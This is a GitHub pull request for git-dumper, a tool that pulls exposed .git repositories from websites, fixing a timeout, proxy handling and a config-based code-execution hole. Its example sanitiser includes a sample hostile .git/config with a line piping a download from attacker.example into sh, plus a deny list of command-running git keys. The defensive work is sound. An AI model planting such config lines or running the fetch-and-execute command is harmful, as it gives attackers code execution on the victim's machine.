arthaud / git-dumper

A tool to dump a git repository from a website
MIT License
1.69k stars 235 forks

Timeout, proxy and RCE fix #43

Closed srozb closed 4 months ago

srozb commented 4 months ago

3 commits stacked here:

  1. The timeout was not applied to the first request, therefore causing the script to get stuck if the target was not responding.
  2. As mentioned in #42, potentially dangerous variables in the .git/config file may cause RCE. This commit tries to comment out lines that may be unsafe - feel free to add more patterns of such lines. I'm aware this is not a perfect solution, but it is at least some kind of protection.
  3. I'm not sure if the proxy configuration was applied to the git command issued as a subprocess. This commit adds the environment variable ALL_PROXY to ensure git communication uses the configured proxy.
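Added example (not code from this PR or from git-dumper) of the two ideas in items 2 and 3 above: a dumped `.git/config` is attacker-controlled, so directives that make git execute a program are commented out before `git checkout` runs, and the git subprocess gets `ALL_PROXY` in its environment plus a timeout. The `UNSAFE_KEYS` list, the function names and the sample config are this example's own assumptions; the list is illustrative, not exhaustive.

```python
"""Neutralise command-executing directives in a dumped .git/config.

Example code, not git-dumper's own. UNSAFE_KEYS is an illustrative,
non-exhaustive list of section.key pairs (subsection ignored) that make
git run an external program; extend it as needed.
"""
import os
import re
import subprocess
from typing import Dict, List, Optional, Tuple

UNSAFE_KEYS = {
    "core.fsmonitor", "core.hookspath", "core.sshcommand", "core.gitproxy",
    "diff.external", "diff.command", "difftool.cmd", "mergetool.cmd",
    "merge.driver", "filter.clean", "filter.smudge", "filter.process",
    "credential.helper", "include.path", "includeif.path",
}

# [section] or [section "subsection"]; deprecated [section.subsection] also handled.
_SECTION_RE = re.compile(r'^\s*\[\s*([A-Za-z0-9.-]+)(?:\s+"(?:[^"\\]|\\.)*")?\s*\]')
# key, optionally followed by "= value"; a bare key means boolean true.
_KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*(?:=\s*(.*))?$')


def _continues(line: str) -> bool:
    """True if the value continues on the next line (odd number of trailing backslashes)."""
    s = line.rstrip()
    return (len(s) - len(s.rstrip("\\"))) % 2 == 1


def sanitize_git_config(text: str) -> Tuple[str, List[str]]:
    """Return (sanitised text, list of section.key names that were commented out)."""
    out: List[str] = []
    removed: List[str] = []
    section = ""
    muting = False  # inside a multi-line value whose first line we commented out
    for line in text.splitlines():
        if muting:
            out.append("#" + line)  # continuation lines must go too, or they become new keys
            muting = _continues(line)
            continue
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            out.append(line)
            continue
        m = _SECTION_RE.match(line)
        if m:
            section = m.group(1).split(".")[0].lower()
            out.append(line)
            continue
        m = _KEY_RE.match(line)
        if m is None:
            out.append(line)  # unparsable: git will reject it anyway, keep the error visible
            continue
        key = m.group(1).lower()
        value = (m.group(2) or "").strip().lstrip('"')
        name = f"{section}.{key}"
        # Any alias whose value starts with "!" is a shell command.
        if name in UNSAFE_KEYS or (section == "alias" and value.startswith("!")):
            removed.append(name)
            out.append("#" + line)
            muting = _continues(line)
        else:
            out.append(line)
    return "\n".join(out) + "\n", removed


def git_env(proxy: Optional[str]) -> Dict[str, str]:
    """Environment for git subprocesses; ALL_PROXY makes git use the dumper's proxy."""
    env = dict(os.environ)
    if proxy:
        env["ALL_PROXY"] = proxy
    return env


def safe_checkout(repo_dir: str, proxy: Optional[str] = None, timeout: float = 30.0) -> List[str]:
    """Sanitise repo_dir/.git/config, then run git checkout with the proxy env and a timeout."""
    cfg = os.path.join(repo_dir, ".git", "config")
    with open(cfg, encoding="utf-8", errors="replace") as f:
        cleaned, removed = sanitize_git_config(f.read())
    if removed:
        with open(cfg, "w", encoding="utf-8") as f:
            f.write(cleaned)
    subprocess.run(["git", "checkout", "--", "."], cwd=repo_dir,
                   env=git_env(proxy), check=True, timeout=timeout)
    return removed


# Constructed sample of a hostile .git/config (not taken from any real target).
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tfsmonitor = "curl http://attacker.example/x | sh"
\tsshCommand = /tmp/evil \\
\t    --flag
[remote "origin"]
\turl = https://github.com/example/repo.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[filter "lfs"]
\tclean = git-lfs clean -- %f
\trequired = true
[alias]
\tst = status
\tpwn = !sh -c id
"""

if __name__ == "__main__":
    cleaned_text, dropped = sanitize_git_config(SAMPLE_CONFIG)
    print("commented out:", dropped)
    print(cleaned_text)
```

Commenting a line out rather than deleting it keeps the evidence in the dump, and the continuation handling matters: if only the first line of a backslash-continued value were commented, the next line would be parsed as a fresh boolean key.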
srozb commented 4 months ago

Please take another look at the changed source, as I'm not 100% sure if I picked the correct line to move the environment creation to.

I think eventually it'd be better to move the ALL_PROXY env variable creation to just after the pysocks proxy is set up and ensure every subprocess call is made with the env=environment argument. It'd also be nice to bind sanitization to checkout, putting them together in a separate function.

(thinking out loud)

arthaud commented 4 months ago

Great, thanks for contributing!